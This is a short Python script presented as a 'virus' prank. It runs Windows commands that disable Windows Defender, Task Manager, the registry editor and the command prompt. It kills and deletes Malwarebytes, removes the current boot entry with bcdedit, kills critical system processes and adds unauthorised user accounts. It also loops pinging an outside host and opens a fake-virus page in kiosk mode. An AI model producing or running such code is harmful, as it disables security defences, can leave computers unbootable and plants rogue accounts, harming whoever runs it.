import time
import os
print("I warned you! wait 5 secs or close window if this is ur pc.")
time.sleep(5)
os.system('reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f')
os.system('dir /s >nul')
os.system('ping heckersite.ct8.pl')
print("Connected to remote server")
os.system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f')
os.system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f')
os.system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableCMD /t REG_DWORD /d 1 /f')
os.system("C:\Program Files\Google\Chrome\Application\chrome.exe https://geekprank.com/fake-virus/ --kiosk")
f = open("demofile3.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
f = open("demofile4.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
f = open("demofile5.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
f = open("demofile6.txt", "w")
f.write("Woops! I have deleted the content!")
f.close()
os.system("taskkill /f /im MBAMService.exe")
os.system("del /s /q /f C:\Program Files\Malwarebytes")
os.system("bcdedit /delete {current}")
print("You opened a virus ): Your BCD is now gone")
os.system("shutdown -r -t 1")
os.system("wininit")
os.system("taskkill /f /im wininit.exe")
os.system("taskkill /f /im winlogon.exe")
os.system("shutdown -a")
os.system("net user Hacker01 /add")
os.system("net user Hacker02 /add")
os.system("net user Hacker01 123")
os.getcwd()
while True:
  os.system("ping heckersite.ct8.pl")
  print("Tested connection to server.")
